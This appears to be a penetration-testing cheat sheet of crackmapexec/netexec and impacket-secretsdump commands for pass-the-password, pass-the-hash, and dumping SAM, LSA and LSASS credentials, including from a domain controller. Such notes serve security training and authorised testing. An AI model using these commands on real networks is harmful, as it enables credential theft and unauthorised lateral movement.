If we crack a password and/or can dump the SAM (Security Accounts Manager) hashes, we can leverage both for lateral movement in networks.
crackmapexec/netexec:
Pass the Password
crackmapexec smb <ip/CIDR> -u <user> -d <domain> -p <password> {Authenticate to a remote SMB server using the provided password}
Pass the hash (NTLMv1 Hash)
crackmapexec smb <ip/CIDR> -u <user> -H <hash> --local-auth {Authenticate to the target system using the user's password hash}
crackmapexec smb <ip/CIDR> -u <user> -H <hash> --local-auth --sam {Dump the SAM hashes from the target system directly}
crackmapexec smb <ip/CIDR> -u <user> -H <hash> --local-auth --shares {Enumerates the available SMB shares on the target system}
crackmapexec smb <ip/CIDR> -u <user> -H <hash> --local-auth --lsa {Dumps the Local Security Authority (LSA) from the target system}
crackmapexec smb -L {Lists all built-in modules}
crackmapexec smb <ip/CIDR> -u <user> -H <hash> --local-auth -M lsassy {Dumps the LSASS (Local Security Authority Subsystem Service) memory from the target system}
--user-auth: Authentication using the provided credentials locally on the target machine, rather than using domain credentialsThe CME DB: Store various pieces of information collected during penetration testing activities. It helps in organizing data gathered from SMB shares, network enumeration, credential validation, and other reconnaissance activities
Metasploit: Grab some local hashes
secretsdump: Grab some local hashes
Dump the hashes stored in the SAM database and LSA secrets.
secretsdump.py / impacket-secretsdump
impacket-secretsdump <domain>/<user>:<password>@<user-ip>
impacket-secretsdump <domain>/<domain-admin>:<password>@<domain-controller-ip>
impacket-secretsdump <user>:@<user-ip> -hashes <hash>